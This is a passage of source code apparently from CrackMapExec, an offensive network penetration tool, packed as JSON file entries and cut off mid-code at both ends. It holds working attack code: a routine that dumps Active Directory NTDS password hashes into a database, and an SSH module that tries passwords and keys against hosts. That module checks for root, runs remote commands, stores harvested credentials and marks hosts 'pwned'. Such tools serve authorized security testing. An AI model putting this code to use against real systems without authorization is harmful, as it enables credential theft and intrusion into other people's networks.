add_ntds_hash.ntds_hashes = 0\n add_ntds_hash.added_to_db = 0\n\n if self.remote_ops:\n try:\n if self.args.ntds == \"vss\":\n NTDSFileName = self.remote_ops.saveNTDS()\n use_vss_method = True\n\n except Exception as e:\n # if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:\n # We don't store the resume file if this error happened, since this error is related to lack\n # of enough privileges to access DRSUAPI.\n # resumeFile = NTDS.getResumeSessionFile()\n # if resumeFile is not None:\n # os.unlink(resumeFile)\n self.logger.fail(e)\n\n NTDS = NTDSHashes(\n NTDSFileName,\n self.bootkey,\n isRemote=True,\n history=False,\n noLMHash=True,\n remoteOps=self.remote_ops,\n useVSSMethod=use_vss_method,\n justNTLM=True,\n pwdLastSet=False,\n resumeSession=None,\n outputFileName=self.output_filename,\n justUser=self.args.userntds if self.args.userntds else None,\n printUserStatus=True,\n perSecretCallback=lambda secret_type, secret: add_ntds_hash(secret, host_id),\n )\n\n try:\n self.logger.success(\"Dumping the NTDS, this could take a while so go grab a redbull...\")\n NTDS.dump()\n ntds_outfile = f\"{self.output_filename}.ntds\"\n self.logger.success(f\"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {ntds_outfile} of which {highlight(add_ntds_hash.added_to_db)} were added to the database\")\n self.logger.display(\"To extract only enabled accounts from the output file, run the following command: \")\n self.logger.display(f\"cat {ntds_outfile} | grep -iv disabled | cut -d ':' -f1\")\n self.logger.display(f\"grep -iv disabled {ntds_outfile} | cut -d ':' -f1\")\n except Exception as e:\n # if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:\n # We don't store the resume file if this error happened, since this error is related to lack\n # of enough privileges to access DRSUAPI.\n # resumeFile = NTDS.getResumeSessionFile()\n # if resumeFile is not None:\n # os.unlink(resumeFile)\n self.logger.fail(e)\n try:\n self.remote_ops.finish()\n except Exception as e:\n self.logger.debug(f\"Error calling remote_ops.finish(): {e}\")\n NTDS.finish()\n" }, { "path": "cme/protocols/ssh/__init__.py", "content": "" }, { "path": "cme/protocols/ssh/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom sqlalchemy.dialects.sqlite import Insert\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy import MetaData, Table, select, func, delete\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\n\nimport os\nfrom pathlib import Path\nimport configparser\n\nfrom cme.logger import cme_logger\nfrom cme.paths import CME_PATH\n\n# we can't import config.py due to a circular dependency, so we have to create redundant code unfortunately\ncme_config = configparser.ConfigParser()\ncme_config.read(os.path.join(CME_PATH, \"cme.conf\"))\ncme_workspace = cme_config.get(\"CME\", \"workspace\", fallback=\"default\")\n\n\nclass database:\n def __init__(self, db_engine):\n self.CredentialsTable = None\n self.HostsTable = None\n self.LoggedinRelationsTable = None\n self.AdminRelationsTable = None\n self.KeysTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n self.sess = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\"\"\"CREATE TABLE \"credentials\" (\n \"id\" integer PRIMARY KEY,\n \"username\" text,\n \"password\" text,\n \"credtype\" text\n )\"\"\")\n db_conn.execute(\"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"host\" text,\n \"port\" integer,\n \"banner\" text,\n \"os\" text\n )\"\"\")\n db_conn.execute(\"\"\"CREATE TABLE \"loggedin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"credid\" integer,\n \"hostid\" integer,\n \"shell\" boolean,\n FOREIGN KEY(credid) REFERENCES credentials(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\")\n # \"admin\" access with SSH means we have root access, which implies shell access since we run commands to check\n db_conn.execute(\"\"\"CREATE TABLE \"admin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"credid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(credid) REFERENCES credentials(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\")\n db_conn.execute(\"\"\"CREATE TABLE \"keys\" (\n \"id\" integer PRIMARY KEY,\n \"credid\" integer,\n \"data\" text,\n FOREIGN KEY(credid) REFERENCES credentials(id)\n )\"\"\")\n\n def reflect_tables(self):\n with self.db_engine.connect():\n try:\n self.CredentialsTable = Table(\"credentials\", self.metadata, autoload_with=self.db_engine)\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n self.LoggedinRelationsTable = Table(\"loggedin_relations\", self.metadata, autoload_with=self.db_engine)\n self.AdminRelationsTable = Table(\"admin_relations\", self.metadata, autoload_with=self.db_engine)\n self.KeysTable = Table(\"keys\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the CME {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.sess.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.sess.execute(table.delete())\n\n def add_host(self, host, port, banner, os=None):\n \"\"\"\n Check if this host has already been added to the database, if not, add it in.\n \"\"\"\n hosts = []\n updated_ids = []\n\n q = select(self.HostsTable).filter(self.HostsTable.c.host == host)\n results = self.sess.execute(q).all()\n cme_logger.debug(f\"add_host(): Initial hosts results: {results}\")\n\n # create new host\n if not results:\n new_host = {\n \"host\": host,\n \"port\": port,\n \"banner\": banner if banner is not None else \"\",\n \"os\": os if os is not None else \"\",\n }\n hosts = [new_host]\n # update existing hosts data\n else:\n for host_result in results:\n host_data = host_result._asdict()\n cme_logger.debug(f\"host: {host_result}\")\n cme_logger.debug(f\"host_data: {host_data}\")\n # only update column if it is being passed in\n if host is not None:\n host_data[\"host\"] = host\n if port is not None:\n host_data[\"port\"] = port\n if banner is not None:\n host_data[\"banner\"] = banner\n if os is not None:\n host_data[\"os\"] = os\n # only add host to be updated if it has changed\n if host_data not in hosts:\n hosts.append(host_data)\n updated_ids.append(host_data[\"id\"])\n cme_logger.debug(f\"Hosts: {hosts}\")\n\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id)\n update_columns = {col.name: col for col in q.excluded if col.name not in \"id\"}\n q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)\n\n self.sess.execute(q, hosts) # .scalar()\n # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted\n if updated_ids:\n cme_logger.debug(f\"add_host() - Host IDs Updated: {updated_ids}\")\n return updated_ids\n\n def add_credential(self, credtype, username, password, key=None):\n \"\"\"\n Check if this credential has already been added to the database, if not add it in.\n \"\"\"\n credentials = []\n\n # a user can have multiple keys, all with passphrases, and a separate login password\n if key is not None:\n q = (\n select(self.CredentialsTable)\n .join(self.KeysTable)\n .filter(\n func.lower(self.CredentialsTable.c.username) == func.lower(username),\n func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype),\n self.KeysTable.c.data == key,\n )\n )\n results = self.sess.execute(q).all()\n else:\n q = select(self.CredentialsTable).filter(\n func.lower(self.CredentialsTable.c.username) == func.lower(username),\n func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype),\n )\n results = self.sess.execute(q).all()\n\n # add new credential\n if not results:\n new_cred = {\n \"credtype\": credtype,\n \"username\": username,\n \"password\": password,\n }\n credentials = [new_cred]\n # update existing cred data\n else:\n for creds in results:\n # this will include the id, so we don't touch it\n cred_data = creds._asdict()\n # only update column if it is being passed in\n if credtype is not None:\n cred_data[\"credtype\"] = credtype\n if username is not None:\n cred_data[\"username\"] = username\n if password is not None:\n cred_data[\"password\"] = password\n # only add cred to be updated if it has changed\n if cred_data not in credentials:\n credentials.append(cred_data)\n\n # TODO: find a way to abstract this away to a single Upsert call\n q_users = Insert(self.CredentialsTable) # .returning(self.CredentialsTable.c.id)\n update_columns_users = {col.name: col for col in q_users.excluded if col.name not in \"id\"}\n q_users = q_users.on_conflict_do_update(index_elements=self.CredentialsTable.primary_key, set_=update_columns_users)\n cme_logger.debug(f\"Adding credentials: {credentials}\")\n\n self.sess.execute(q_users, credentials) # .scalar()\n # return cred_ids\n\n # hacky way to get cred_id since we can't use returning() yet\n if len(credentials) == 1:\n cred_id = self.get_credential(credtype, username, password)\n if key is not None:\n self.add_key(cred_id, key)\n return cred_id\n else:\n return credentials\n\n def remove_credentials(self, creds_id):\n \"\"\"\n Removes a credential ID from the database\n \"\"\"\n del_hosts = []\n for cred_id in creds_id:\n q = delete(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)\n del_hosts.append(q)\n self.sess.execute(q)\n\n def add_key(self, cred_id, key):\n # check if key relation already exists\n check_q = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all()\n cme_logger.debug(f\"check_q: {check_q}\")\n if check_q:\n cme_logger.debug(f\"Key already exists for cred_id {cred_id}\")\n return\n\n key_data = {\"credid\": cred_id, \"data\": key}\n self.sess.execute(Insert(self.KeysTable), key_data)\n key_id = self.sess.execute(select(self.KeysTable).filter(self.KeysTable.c.credid == cred_id)).all()[0].id\n cme_logger.debug(f\"Key added: {key_id}\")\n return key_id\n\n def get_keys(self, key_id=None, cred_id=None):\n q = select(self.KeysTable)\n if key_id is not None:\n q = q.filter(self.KeysTable.c.id == key_id)\n elif cred_id is not None:\n q = q.filter(self.KeysTable.c.credid == cred_id)\n results = self.sess.execute(q).all()\n return results\n\n def add_admin_user(self, credtype, username, secret, host_id=None, cred_id=None):\n add_links = []\n\n creds_q = select(self.CredentialsTable)\n if cred_id:\n creds_q = creds_q.filter(self.CredentialsTable.c.id == cred_id)\n else:\n creds_q = creds_q.filter(\n func.lower(self.CredentialsTable.c.credtype) == func.lower(credtype),\n func.lower(self.CredentialsTable.c.username) == func.lower(username),\n self.CredentialsTable.c.password == secret,\n )\n creds = self.sess.execute(creds_q)\n hosts = self.get_hosts(host_id)\n\n if creds and hosts:\n for cred, host in zip(creds, hosts):\n cred_id = cred[0]\n host_id = host[0]\n link = {\"credid\": cred_id, \"hostid\": host_id}\n admin_relations_select = select(self.AdminRelationsTable).filter(\n self.AdminRelationsTable.c.credid == cred_id,\n self.AdminRelationsTable.c.hostid == host_id,\n )\n links = self.sess.execute(admin_relations_select).all()\n\n if not links:\n add_links.append(link)\n\n admin_relations_insert = Insert(self.AdminRelationsTable)\n\n if add_links:\n self.sess.execute(admin_relations_insert, add_links)\n\n def get_admin_relations(self, cred_id=None, host_id=None):\n if cred_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.credid == cred_id)\n elif host_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)\n else:\n q = select(self.AdminRelationsTable)\n\n results = self.sess.execute(q).all()\n return results\n\n def remove_admin_relation(self, cred_ids=None, host_ids=None):\n q = delete(self.AdminRelationsTable)\n if cred_ids:\n for cred_id in cred_ids:\n q = q.filter(self.AdminRelationsTable.c.credid == cred_id)\n elif host_ids:\n for host_id in host_ids:\n q = q.filter(self.AdminRelationsTable.c.hostid == host_id)\n self.sess.execute(q)\n\n def is_credential_valid(self, credential_id):\n \"\"\"\n Check if this credential ID is valid.\n \"\"\"\n q = select(self.CredentialsTable).filter(\n self.CredentialsTable.c.id == credential_id,\n self.CredentialsTable.c.password is not None,\n )\n results = self.sess.execute(q).all()\n return len(results) > 0\n\n def get_credentials(self, filter_term=None, cred_type=None):\n \"\"\"\n Return credentials from the database.\n \"\"\"\n # if we're returning a single credential by ID\n if self.is_credential_valid(filter_term):\n q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == filter_term)\n elif cred_type:\n q = select(self.CredentialsTable).filter(self.CredentialsTable.c.credtype == cred_type)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username).like(like_term))\n # otherwise return all credentials\n else:\n q = select(self.CredentialsTable)\n\n results = self.sess.execute(q).all()\n return results\n\n def get_credential(self, cred_type, username, password):\n q = select(self.CredentialsTable).filter(\n self.CredentialsTable.c.username == username,\n self.CredentialsTable.c.password == password,\n self.CredentialsTable.c.credtype == cred_type,\n )\n results = self.sess.execute(q).first()\n if results is None:\n return None\n else:\n return results.id\n\n def is_host_valid(self, host_id):\n \"\"\"\n Check if this host ID is valid.\n \"\"\"\n q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)\n results = self.sess.execute(q).all()\n return len(results) > 0\n\n def get_hosts(self, filter_term=None):\n \"\"\"\n Return hosts from the database.\n \"\"\"\n q = select(self.HostsTable)\n\n # if we're returning a single host by ID\n if self.is_host_valid(filter_term):\n q = q.filter(self.HostsTable.c.id == filter_term)\n results = self.sess.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n # if we're filtering by host\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(self.HostsTable.c.host.like(like_term))\n results = self.sess.execute(q).all()\n cme_logger.debug(f\"SSH get_hosts() - results: {results}\")\n return results\n\n def is_user_valid(self, cred_id):\n \"\"\"\n Check if this User ID is valid.\n \"\"\"\n q = select(self.CredentialsTable).filter(self.CredentialsTable.c.id == cred_id)\n results = self.sess.execute(q).all()\n return len(results) > 0\n\n def get_users(self, filter_term=None):\n q = select(self.CredentialsTable)\n\n if self.is_user_valid(filter_term):\n q = q.filter(self.CredentialsTable.c.id == filter_term)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(func.lower(self.CredentialsTable.c.username).like(like_term))\n results = self.sess.execute(q).all()\n return results\n\n def get_user(self, domain, username):\n q = select(self.CredentialsTable).filter(func.lower(self.CredentialsTable.c.username) == func.lower(username))\n results = self.sess.execute(q).all()\n return results\n\n def add_loggedin_relation(self, cred_id, host_id, shell=False):\n relation_query = select(self.LoggedinRelationsTable).filter(\n self.LoggedinRelationsTable.c.credid == cred_id,\n self.LoggedinRelationsTable.c.hostid == host_id,\n )\n results = self.sess.execute(relation_query).all()\n\n # only add one if one doesn't already exist\n if not results:\n relation = {\"credid\": cred_id, \"hostid\": host_id, \"shell\": shell}\n try:\n cme_logger.debug(f\"Inserting loggedin_relations: {relation}\")\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n\n self.sess.execute(q, [relation]) # .scalar()\n inserted_id_results = self.get_loggedin_relations(cred_id, host_id)\n cme_logger.debug(f\"Checking if relation was added: {inserted_id_results}\")\n return inserted_id_results[0].id\n except Exception as e:\n cme_logger.debug(f\"Error inserting LoggedinRelation: {e}\")\n\n def get_loggedin_relations(self, cred_id=None, host_id=None, shell=None):\n q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n if cred_id:\n q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)\n if host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n if shell:\n q = q.filter(self.LoggedinRelationsTable.c.shell == shell)\n results = self.sess.execute(q).all()\n return results\n\n def remove_loggedin_relations(self, cred_id=None, host_id=None):\n q = delete(self.LoggedinRelationsTable)\n if cred_id:\n q = q.filter(self.LoggedinRelationsTable.c.credid == cred_id)\n elif host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n self.sess.execute(q)\n" }, { "path": "cme/protocols/ssh/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass navigator(DatabaseNavigator):\n def display_creds(self, creds):\n data = [\n [\n \"CredID\",\n \"Admin On\",\n \"Total Logins\",\n \"Total Shells\",\n \"Username\",\n \"Password\",\n \"CredType\",\n ]\n ]\n\n for cred in creds:\n cred_id = cred[0]\n username = cred[1]\n password = cred[2]\n credtype = cred[3]\n\n admin_links = self.db.get_admin_relations(cred_id=cred_id)\n total_users = self.db.get_loggedin_relations(cred_id=cred_id)\n total_shell = total_users = self.db.get_loggedin_relations(cred_id=cred_id, shell=True)\n\n data.append(\n [\n cred_id,\n str(len(admin_links)) + \" Host(s)\",\n str(len(total_users)) + \" Host(s)\",\n str(len(total_shell)) + \" Shells(s)\",\n username,\n password,\n credtype,\n ]\n )\n print_table(data, title=\"Credentials\")\n\n # pull/545\n def display_hosts(self, hosts):\n data = [[\"HostID\", \"Admins\", \"Total Users\", \"Host\", \"Port\", \"Banner\", \"OS\"]]\n\n for h in hosts:\n host_id = h[0]\n host = h[1]\n port = h[2]\n banner = h[3]\n os = h[4]\n\n admin_users = self.db.get_admin_relations(host_id=host_id)\n total_users = self.db.get_loggedin_relations(host_id=host_id)\n data.append(\n [\n host_id,\n str(len(admin_users)) + \" Cred(s)\",\n str(len(total_users)) + \" User(s)\",\n host,\n port,\n banner,\n os,\n ]\n )\n print_table(data, title=\"Hosts\")\n\n def do_hosts(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n hosts = self.db.get_hosts()\n self.display_hosts(hosts)\n else:\n hosts = self.db.get_hosts(filter_term=filter_term)\n\n if len(hosts) > 1:\n self.display_hosts(hosts)\n elif len(hosts) == 1:\n data = [[\"HostID\", \"Host\", \"Port\", \"Banner\", \"OS\"]]\n host_id_list = []\n\n for h in hosts:\n host_id = h[0]\n host_id_list.append(host_id)\n host = h[1]\n port = h[2]\n banner = h[3]\n os = h[4]\n\n data.append([host_id, host, port, banner, os])\n print_table(data, title=\"Host\")\n\n admin_access_data = [[\"CredID\", \"CredType\", \"UserName\", \"Password\", \"Shell\"]]\n nonadmin_access_data = [[\"CredID\", \"CredType\", \"UserName\", \"Password\", \"Shell\"]]\n for host_id in host_id_list:\n admin_links = self.db.get_admin_relations(host_id=host_id)\n nonadmin_links = self.db.get_loggedin_relations(host_id=host_id)\n\n for link in admin_links:\n link_id, cred_id, host_id = link\n creds = self.db.get_credentials(filter_term=cred_id)\n\n for cred in creds:\n cred_id = cred[0]\n username = cred[1]\n password = cred[2]\n credtype = cred[3]\n shell = True\n\n admin_access_data.append([cred_id, credtype, username, password, shell])\n\n # probably a better way to do this without looping through and requesting them all again,\n # but I just want to get this working for now\n for link in nonadmin_links:\n link_id, cred_id, host_id, shell = link\n creds = self.db.get_credentials(filter_term=cred_id)\n for cred in creds:\n cred_id = cred[0]\n username = cred[1]\n password = cred[2]\n credtype = cred[3]\n shell = shell\n\n cred_data = [cred_id, credtype, username, password, shell]\n\n if cred_data not in admin_access_data:\n nonadmin_access_data.append(cred_data)\n\n if len(nonadmin_access_data) > 1:\n print_table(\n nonadmin_access_data,\n title=\"Credential(s) with Non Admin Access\",\n )\n if len(admin_access_data) > 1:\n print_table(admin_access_data, title=\"Credential(s) with Admin Access\")\n\n def help_hosts(self):\n help_string = \"\"\"\n hosts [filter_term]\n By default prints all hosts\n Table format:\n | 'HostID', 'Host', 'Port', 'Banner', 'OS' |\n \"\"\"\n print_help(help_string)\n\n def do_creds(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n creds = self.db.get_credentials()\n self.display_creds(creds)\n # TODO\n # elif filter_term.split()[0].lower() == \"add\":\n # # add format: \"domain username password \n # args = filter_term.split()[1:]\n #\n # if len(args) == 3:\n # domain, username, password = args\n # if validate_ntlm(password):\n # self.db.add_credential(\"hash\", domain, username, password)\n # else:\n # self.db.add_credential(\"plaintext\", domain, username, password)\n # else:\n # print(\"[!] Format is 'add username password\")\n # return\n elif filter_term.split()[0].lower() == \"remove\":\n args = filter_term.split()[1:]\n if len(args) != 1:\n print(\"[!] Format is 'remove '\")\n return\n else:\n self.db.remove_credentials(args)\n self.db.remove_admin_relation(user_ids=args)\n elif filter_term.split()[0].lower() == \"plaintext\":\n creds = self.db.get_credentials(cred_type=\"plaintext\")\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"key\":\n creds = self.db.get_credentials(cred_type=\"key\")\n self.display_creds(creds)\n else:\n creds = self.db.get_credentials(filter_term=filter_term)\n if len(creds) != 1:\n self.display_creds(creds)\n elif len(creds) == 1:\n cred_data = [[\"CredID\", \"UserName\", \"Password\", \"CredType\"]]\n cred_id_list = []\n\n for cred in creds:\n cred_id = cred[0]\n cred_id_list.append(cred_id)\n username = cred[1]\n password = cred[2]\n credtype = cred[3]\n\n cred_data.append([cred_id, username, password, credtype])\n print_table(cred_data, title=\"Credential(s)\")\n\n admin_access_data = [[\"HostID\", \"Host\", \"Port\", \"Banner\", \"OS\", \"Shell\"]]\n nonadmin_access_data = [[\"HostID\", \"Host\", \"Port\", \"Banner\", \"OS\", \"Shell\"]]\n\n for cred_id in cred_id_list:\n admin_links = self.db.get_admin_relations(cred_id=cred_id)\n nonadmin_links = self.db.get_loggedin_relations(cred_id=cred_id)\n\n for link in admin_links:\n link_id, cred_id, host_id = link\n hosts = self.db.get_hosts(host_id)\n for h in hosts:\n host_id = h[0]\n host = h[1]\n port = h[2]\n banner = h[3]\n os = h[4]\n shell = True # if we have root via SSH, we know it's a shell\n\n admin_access_data.append([host_id, host, port, banner, os, shell])\n\n # probably a better way to do this without looping through and requesting them all again,\n # but I just want to get this working for now\n for link in nonadmin_links:\n link_id, cred_id, host_id, shell = link\n hosts = self.db.get_hosts(host_id)\n for h in hosts:\n host_id = h[0]\n host = h[1]\n port = h[2]\n banner = h[3]\n os = h[4]\n host_data = [host_id, host, port, banner, os, shell]\n if host_data not in admin_access_data:\n nonadmin_access_data.append(host_data)\n\n # we look if it's greater than one because the header row always exists\n if len(nonadmin_access_data) > 1:\n print_table(nonadmin_access_data, title=\"Non-Admin Access to Host(s)\")\n if len(admin_access_data) > 1:\n print_table(admin_access_data, title=\"Admin Access to Host(s)\")\n\n def help_creds(self):\n help_string = \"\"\"\n creds [add|remove|plaintext|key|filter_term]\n By default prints all creds\n Table format:\n | 'CredID', 'Admin On', 'CredType', 'UserName', 'Password', 'Key' (if key type) |\n Subcommands:\n add - format: \"add username password \"\n remove - format: \"remove \"\n plaintext - prints plaintext creds\n key - prints ssh key creds\n filter_term - filters creds with filter_term\n If a single credential is returned (e.g. `creds 15`, it prints the following tables:\n Credential(s) | 'CredID', 'CredType', 'UserName', 'Password', 'Key' |\n Admin Access to Host(s) | 'HostID', 'Host', 'OS', 'Banner'\n Otherwise, it prints the default credential table from a `like` query on the `username` column\n \"\"\"\n print_help(help_string)\n\n def display_keys(self, keys):\n data = [[\"Key ID\", \"Cred ID\", \"Key Data\"]]\n for key in keys:\n data.append([key[0], key[1], key[2]])\n print_table(data, \"Keys\")\n\n def do_keys(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n keys = self.db.get_keys()\n self.display_keys(keys)\n elif filter_term == \"cred_id\":\n cred_id = filter_term.split()[1]\n keys = self.db.get_keys(cred_id=cred_id)\n self.display_keys(keys)\n else:\n key_id = filter_term\n keys = self.db.get_keys(key_id=key_id)\n self.display_keys(keys)\n\n def help_keys(self):\n help_string = \"\"\"\n list SSH keys\n keys [id]\n \"\"\"\n print_help(help_string)\n\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you\" \" want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n\n @staticmethod\n def complete_hosts(self, text, line):\n \"\"\"\n Tab-complete 'hosts' commands.\n \"\"\"\n commands = [\"add\", \"remove\"]\n\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n\n def complete_creds(self, text, line):\n \"\"\"\n Tab-complete 'creds' commands.\n \"\"\"\n commands = [\"add\", \"remove\", \"key\", \"plaintext\"]\n\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n" }, { "path": "cme/protocols/ssh/proto_args.py", "content": "def proto_args(parser, std_parser, module_parser):\n ssh_parser = parser.add_parser(\"ssh\", help=\"own stuff using SSH\", parents=[std_parser, module_parser])\n ssh_parser.add_argument(\"--key-file\", type=str, help=\"Authenticate using the specified private key. Treats the password parameter as the key's passphrase.\")\n ssh_parser.add_argument(\"--port\", type=int, default=22, help=\"SSH port (default: 22)\")\n\n cgroup = ssh_parser.add_argument_group(\"Command Execution\", \"Options for executing commands\")\n cgroup.add_argument(\"--no-output\", action=\"store_true\", help=\"do not retrieve command output\")\n cgroup.add_argument(\"-x\", metavar=\"COMMAND\", dest=\"execute\", help=\"execute the specified command\")\n cgroup.add_argument(\"--remote-enum\", action=\"store_true\", help=\"executes remote commands for enumeration\")\n\n return parser\n" }, { "path": "cme/protocols/ssh.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\n\nfrom io import StringIO\n\nimport paramiko\n\nfrom cme.config import process_secret\nfrom cme.connection import *\nfrom cme.logger import CMEAdapter\nfrom paramiko.ssh_exception import (\n AuthenticationException,\n NoValidConnectionsError,\n SSHException,\n)\n\n\nclass ssh(connection):\n def __init__(self, args, db, host):\n self.protocol = \"SSH\"\n self.remote_version = None\n self.server_os = None\n super().__init__(args, db, host)\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"SSH\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n }\n )\n logging.getLogger(\"paramiko\").setLevel(logging.WARNING)\n\n def print_host_info(self):\n self.logger.display(self.remote_version)\n return True\n\n def enum_host_info(self):\n self.remote_version = self.conn._transport.remote_version\n self.logger.debug(f\"Remote version: {self.remote_version}\")\n self.server_os = \"\"\n if self.args.remote_enum:\n stdin, stdout, stderr = self.conn.exec_command(\"uname -r\")\n self.server_os = stdout.read().decode(\"utf-8\")\n self.logger.debug(f\"OS retrieved: {self.server_os}\")\n self.db.add_host(self.host, self.args.port, self.remote_version, os=self.server_os)\n\n def create_conn_obj(self):\n self.conn = paramiko.SSHClient()\n self.conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n self.conn.connect(self.host, port=self.args.port)\n except AuthenticationException:\n return True\n except SSHException:\n return True\n except NoValidConnectionsError:\n return False\n except socket.error:\n return False\n\n def client_close(self):\n self.conn.close()\n\n def check_if_admin(self):\n # we could add in another method to check by piping in the password to sudo\n # but that might be too much of an opsec concern - maybe add in a flag to do more checks?\n stdin, stdout, stderr = self.conn.exec_command(\"id\")\n if stdout.read().decode(\"utf-8\").find(\"uid=0(root)\") != -1:\n self.logger.info(f\"Determined user is root via `id` command\")\n self.admin_privs = True\n return True\n stdin, stdout, stderr = self.conn.exec_command(\"sudo -ln | grep 'NOPASSWD: ALL'\")\n if stdout.read().decode(\"utf-8\").find(\"NOPASSWD: ALL\") != -1:\n self.logger.info(f\"Determined user is root via `sudo -ln` command\")\n self.admin_privs = True\n return True\n\n def plaintext_login(self, username, password, private_key=None):\n try:\n if self.args.key_file or private_key:\n if private_key:\n pkey = paramiko.RSAKey.from_private_key(StringIO(private_key))\n else:\n pkey = paramiko.RSAKey.from_private_key_file(self.args.key_file)\n\n self.logger.debug(f\"Logging in with key\")\n self.conn.connect(\n self.host,\n port=self.args.port,\n username=username,\n passphrase=password if password != \"\" else None,\n pkey=pkey,\n look_for_keys=False,\n allow_agent=False,\n )\n if private_key:\n cred_id = self.db.add_credential(\n \"key\",\n username,\n password if password != \"\" else \"\",\n key=private_key,\n )\n else:\n with open(self.args.key_file, \"r\") as f:\n key_data = f.read()\n cred_id = self.db.add_credential(\n \"key\",\n username,\n password if password != \"\" else \"\",\n key=key_data,\n )\n else:\n self.logger.debug(f\"Logging in with password\")\n self.conn.connect(\n self.host,\n port=self.args.port,\n username=username,\n password=password,\n look_for_keys=False,\n allow_agent=False,\n )\n cred_id = self.db.add_credential(\"plaintext\", username, password)\n\n shell_access = False\n host_id = self.db.get_hosts(self.host)[0].id\n\n if self.check_if_admin():\n shell_access = True\n self.logger.debug(f\"User {username} logged in successfully and is root!\")\n if self.args.key_file:\n self.db.add_admin_user(\"key\", username, password, host_id=host_id, cred_id=cred_id)\n else:\n self.db.add_admin_user(\n \"plaintext\",\n username,\n password,\n host_id=host_id,\n cred_id=cred_id,\n )\n else:\n stdin, stdout, stderr = self.conn.exec_command(\"id\")\n output = stdout.read().decode(\"utf-8\")\n if not output:\n self.logger.debug(f\"User cannot get a shell\")\n shell_access = False\n else:\n shell_access = True\n\n self.db.add_loggedin_relation(cred_id, host_id, shell=shell_access)\n\n if self.args.key_file:\n password = f\"{password} (keyfile: {self.args.key_file})\"\n\n display_shell_access = f\" - shell access!\" if shell_access else \"\"\n\n self.logger.success(f\"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}\")\n return True\n except (\n AuthenticationException,\n NoValidConnectionsError,\n 